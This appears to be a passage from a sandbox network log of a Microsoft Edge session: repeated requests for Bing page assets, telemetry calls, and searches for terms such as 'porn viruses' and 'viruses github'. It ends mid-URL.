HTTP Request

GET https://r.bing.com/rp/HnTisSbDqDcynvZ6icoKs1zYGQE.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/WPdUF5dLCtutNLHF5Ld5b54Ssjg.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/HCr-NzLR4hN0cooQ6Hk3WYStjdE.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/eeGCipqheoe_uezlnNy3LLj5EpM.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/ASquubOekjWYCJwlunJ-aqgJVvM.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/tPLNa5UcMaQEzzg0acZfPM45N6I.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/rtWOo8CaMgE2MXkPxPlkltyg2A8.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/yj7m_FD5mF9gOu3E6yQ461205q0.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/iaSRX-ryuc5f_9oE3MXJWNBNcYY.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/qd1xHozTDAiLTDmIfvvogDsKAWc.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/tH67fvQiF0nalrIJQQCukA-8_u4.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/HK3JWgw7vGok-S1ZNIRi81ouk9s.br.css

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/zNCol8wZNOqNu5J9AALR7kSilGc.br.css

tls, http

msedge.exe

28.9kB
29.9kB
68
83

HTTP Request

GET https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Qo1KJzoRMo31gE9sb--6dyXZlXw.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/icNDaHbrcaIFIZRVzDw7Mn4j_ws.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/dVMW5tVdi3_S7aODH6eNGoZMETI.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/BAy11H3wRXaRcm85yqz4_tjE_U8.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/sd09ZoqYFtYgki8gbUcaMRzc1N4.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/RuJsq8eAYqkavNQ_kj9tyr6ZZ4U.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/-daH6PNAGaQg3qCzuka0kd2jKdY.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/gQ1jxIQABGnYmoqYi1itol2s4Nc.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Sup-zKprBXap74esHIEtHpeXnfE.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/5W/cc,nc/o7B3FK6ymEOn7sBfZSmifVTwxPk.css?bu=AYcB&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/zNCol8wZNOqNu5J9AALR7kSilGc.br.css

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rb/3U/cc,nc/ZOYbVXpq18yLnUtuc0-dHAFFlHs.css?bu=AowDrQM&or=w

tls, http

msedge.exe

27.8kB
39.9kB
67
85

HTTP Request

GET https://r.bing.com/rb/5W/cc,nc/S82YEC3KdUeCBfNcc1WIZiHkL0c.css?bu=IYcBhwGTD7QRhwHfEdwSuRjtGPcYhwGHAa8a5Cf7KocB6DSgQYcBhwHBL60HsAeHAU_hAfQEhwGHAZ1Y0liHAYcB&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/8hd1-XgnZ26SnhiiMN_GgejYN8w.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/7APrwFbw1Ly9Oc0nCuyUM30nTqM.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/5U/cc,nc/x0UaV4rAXPOr7W3kHPDIjM0y2-0.css?bu=BG-2F7MXqRc&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/uf6-405sDPw8dZxAwsFhXIwMMWQ.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Ra6gRXsMm2WooMA178dYrbFLMUU.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/_ykiGO1K5rjAQeICdJheT3jfLeY.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/u-4Ai6DMrVZyhkEXANflEG9s7kY.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/r1W3Us9sqNEEDTV-z9ivBVemdOs.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/f7F7gkCBmf3fpEpT07FtU78rkg4.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/qknPGyrUUs04dCZE8vL9P-T_IMs.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/3U/cc,nc/ZOYbVXpq18yLnUtuc0-dHAFFlHs.css?bu=AowDrQM&or=w

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/nmmBy6yVoFq1jGrAy2mcAhHTx1I.br.css

tls, http

msedge.exe

33.6kB
45.4kB
76
97

HTTP Request

GET https://r.bing.com/rp/zh5yhbkbJVkzFqNrcigech9CW1Y.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/6vW-cIY2Dxj_U1X3fdBnNVLFgF8.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/kOm4AqlRH_KYkP_B2D5VD-3ub90.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/iex9xOQQZy9eCAA55osfedgdfHY.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/VktYCgYmJQhASKykbCzusQ8Uqo8.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/2W6N7byXj1BspnYUZI2WP3l11J0.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/g2mFaePdYzQOubI8JEItbebrED8.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/XR_FNBb3zsca2UvXLDaXw6zHvY8.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/d1CTdFN2PzYdPJfj02hT834p0CA.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/pVQ8VyPW8DMdPUXdndzLmc8yWp4.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/9QVAd0uprTCf6QvhFRBK-cLsJ44.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/IlGx5JyQLSR5amBY1qzAWL3z-LI.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/nmmBy6yVoFq1jGrAy2mcAhHTx1I.br.css

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

tls, http

msedge.exe

14.8kB
46.9kB
67
91

HTTP Request

GET https://r.bing.com/rp/d9TRXXZEoyyMfHxWr0fybsRFV_g.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

404

HTTP Request

GET https://r.bing.com/rs/6s/fU/jnc,nj/tlifxqsNyCzxIJnRwtQKuZToQQw.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/yt5G3936XbeOUUYvhktH-Zp37Ac.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/qwce00QJxdHzNxXh5H1mBc8QgBU.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/V5dpoD3fjhPtv-hIh3ssEsOr5_M.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/MHGveHjpT20MyFEdoL1KWdpZGoU.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/XpyaFPNakGOwlPXoOWhSNZDWjDU.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/_cQCYzUIUDtiKJi2Mubb5vkdlxs.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rs/6s/lA/nj/pxzfjFIjWTDQikh0A5aT_cguYyc.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/uceaWoHkRefVM5EK1cFT2TcyRm0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/OO7WGtZfHYNIDiCauwJaf5PGmxw.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/lhnOsb1440cRnpHJLM_raa23Jj8.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

HTTP Response

200
92.123.128.164:443

https://r.bing.com/sa/simg/Roboto_Semibold.woff2

tls, http

msedge.exe

18.7kB
68.1kB
87
118

HTTP Request

GET https://r.bing.com/rp/FIrq4n7XJcH-bxJlHvalz0nETAA.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/DXWOtH36Xc9q8xTmhl8XAK5tw_w.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/KjcQM3UW1nOQMxru5p6M1wKu4ZQ.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/1KnmNqMx2Ms13sCKZ0bZ_VWynP0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/eFDN7fKU2A1-FihFOP4WWnERGEw.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/cVhztCgE3ZjlZ4NrICPGsTh1WbQ.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/JoohjY70ffsi6uD_M8C9yDukIcc.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Mi_1CQO28mEq97e_dzQbiA3Bgx0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/VtuQ9KZHE8bgpHcyoOX_FX2AI6M.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rs/6s/xk/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Nz3080e44w3456W4QiR1L5nz6Tg.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/qwMEjUE0QQWPAgcHgP467OnJ6x0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/x6CS8glKlDAxrUISUqfsWELwuk8.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/4rrrDiK2SXrlTjVU6cqmUwPcf4E.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/dzSvQg5en-0RGfL_Yhu9mN2Zmog.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/mJUKbhysGPVV0f_zho_k3BkdtlU.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rs/6s/vf/jnc,nj/Qp5q6DtDal0Q6zp3EOeEQbFTsW0.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/n2FQtop8uqqg-oVOlp2QiedHTy0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/AsdMf7D6KLdP5SQOeuSIZtV8-sA.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

404
92.123.128.164:443

https://r.bing.com/sa/simg/Roboto_Regular.woff2

tls, http

msedge.exe

18.3kB
53.4kB
80
104

HTTP Request

GET https://r.bing.com/rp/w2ye0W2xVVGtLI2lFrOy9f7eTEE.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Response

404

HTTP Request

GET https://r.bing.com/rp/iqYxm8r46lk-3ernDKEwdszk1wo.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/OyRnaZe6gJ8kMXuak91zU0baVM4.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/x2emqXiwLnoij1FAO-zonC2BP_I.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/fYa4G4wbz4PjD3tZaW3pycMuo2c.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/LLsqdhmv3RjYgfuepDBrVLeWshY.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Hdw3pI7FtFvJcOy2ZZvd6vlbAOU.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/6ZpK9fh9cD0LYcXzkYpUR9MV_-g.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rs/6s/lO/nj/EmG-XMIMCcq8zmcVBBO7jkFERAE.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/4YcUwB3cLExJ1hflyCLNk8MH_3o.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/4xONqw98GiV7FRuGhk0jeK0l40I.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/492EisGuZn95Ylm-pbhazWgz4O8.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/dLXNK3o3tyXzkXA3Jj8ciHATOYc.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/hAEVe25_jil71qxV8HNHEcjwOsk.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Response

404
92.123.128.162:443

th.bing.com

tls

msedge.exe

1.1kB
5.2kB
12
13
23.204.237.191:443

https://s.bingparachute.com/search?q=porn%20viruses&mkt=nl-nl&muid=05879ADD3EF86D540F588FD23FDB6C78&impressionguid=0DD30F05AB304142B388EAD39E0E9879&traceid=670163c530fd47b881461133ee19e33f&refid=Ref%20A%3A%20670163c530fd47b881461133ee19e33f%20Ref%20B%3A%20DUBEEAP0000E10D%20Ref%20C%3A%202024-10-05T16%3A05%3A25Z

tls, http

msedge.exe

3.1kB
6.7kB
36
37

HTTP Request

GET https://s.bingparachute.com/search?q=porn%20viruses&mkt=nl-nl&muid=05879ADD3EF86D540F588FD23FDB6C78&impressionguid=0DD30F05AB304142B388EAD39E0E9879&traceid=670163c530fd47b881461133ee19e33f&refid=Ref%20A%3A%20670163c530fd47b881461133ee19e33f%20Ref%20B%3A%20DUBEEAP0000E10D%20Ref%20C%3A%202024-10-05T16%3A05%3A25Z

HTTP Response

404
2.19.117.148:443

https://aefd.nelreports.net/api/report?cat=bingparachute

tls, http

msedge.exe

6.6kB
10.3kB
54
56

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingaotak

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingaotak

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingparachute

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingparachute

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingaotak

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingparachute

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingaotak

HTTP Response

200

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingparachute

HTTP Response

500
92.123.128.164:443

https://r.bing.com/rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js

tls, http

msedge.exe

14.0kB
64.3kB
74
103

HTTP Request

GET https://r.bing.com/rp/NW_w0EXs3h3l9N3PeqyVuRIrqp8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/TFi00n9kt1lqPoE9f5YVPavsHbE.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/2B9u0snswl6MSm6KlelCMIZAr0E.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Yp5uRx1ZvJMBOj_5nU0FUN0279s.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/xvEz2IbMlyghPZ3oNAHr9N-xMOA.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/j7QTvC_hnIspQX0jVufvDFJYNV0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/GSNeCa5XvtoP6jz0k5V172vRaQ8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/I_ndi6vVBymh23DuqRe-LcSg9Uk.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/sOzNATb8EjFgAA3x7Df1qhIXaNc.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/JKDfMHWwFo09583bHCYpZTQ4YHE.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/3u/jnc,nj/MVT8kycZ0G8jBgAYbG29BRlRppY.js?bu=Afgd&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/uxXBTBO1ddKwkiMm_T80NZjeg90.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js

tls, http

msedge.exe

14.4kB
45.8kB
70
90

HTTP Request

GET https://r.bing.com/rb/4O/jnc,nj/WjC77O8uVx9--UZpQC4Qfpa7qaE.js?bu=A_Y2-Tb8Ng&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rs/6s/ke/jnc,nj/A4dBY6gAfiTsvXYChf4nbN0dONk.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/QhINJ5aAulL1ot_r_8dLH_aIfCk.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/kdaXFKcmbJ_ZSIFJtGtj5iaX3Rs.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/TjyWAmemrltxca9Tew0hTL__JHg.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/awRIKLY04rWw5wNlVL186SolQSo.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rs/6s/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/N8R8Z3POBvxafKAbcSeJEMJBVYU.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/43BJuM7qM_8Wd1WfIZM2_oK9zrw.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Response

404

HTTP Request

GET https://r.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

404

HTTP Request

GET https://r.bing.com/rp/xNXcmtdwycOn0MCvsFO8RJsXvi0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/yZjAz6-B4hIBhJ6D3nAyY_Ebn44.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js

tls, http

msedge.exe

12.0kB
30.0kB
57
74

HTTP Request

GET https://r.bing.com/rp/AJF0byxTDIdetV3TqxY9v12oeN8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/B41j9eGM1DLNjQd-XrgY_sctGDk.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/T5889cz8zTrV7Rl2tlyjGriSuv0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/8xkvUeJjS0zgx9UJLaoz8Ih_Yy4.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/LJBbk33xj0wpN1yZ2F5CHaTSir0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/PmNLAq2f0t_lcD3LTchFOVy6h-U.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Gw7eETSwe7GHmKwW1lRqGPQJXRo.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/910ptS3pcIDQ7a5acMaHuQliuN0.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Xz21jpkTfbBon6hHKW7e4R7Hl0U.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/uiannz55FdT0j3p9jGwegfI5aIY.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/KQKNm9M7e0OM4kJIo9i_NPl67J8.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/yjkALwKjIzPE-fFQuG0Wx49NU58.gz.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js

HTTP Response

200
92.123.128.189:443

https://www.bing.com/qbox?query=anydde&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=19f223458719487eaf9ca017380efdc9&oit=1&cp=6&pgcl=4

tls, http

msedge.exe

64.0kB
65.1kB
90
116

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144332372%2C%22Name%22%3A%22AnimationLoad%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=por&cp=3&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.56075d82803f36bef7e22272b297403f&w=120&h=120&c=6&p=0&pid=RS

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=v&cp=1&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OIP.ApkJS9QGG_goYQeyHaLw5AHaFj&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.b27b03702ef0e489faa6e354d6ec7c12&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2214%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=1D2FDF991A984BF98138E4B738C9DC15

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350331%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350332%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350335%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1728144350543%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22670163dd24e349b69be2fd3c6e8a3c0c%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144350571%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22670163dd24e349b69be2fd3c6e8a3c0c%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144350571%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.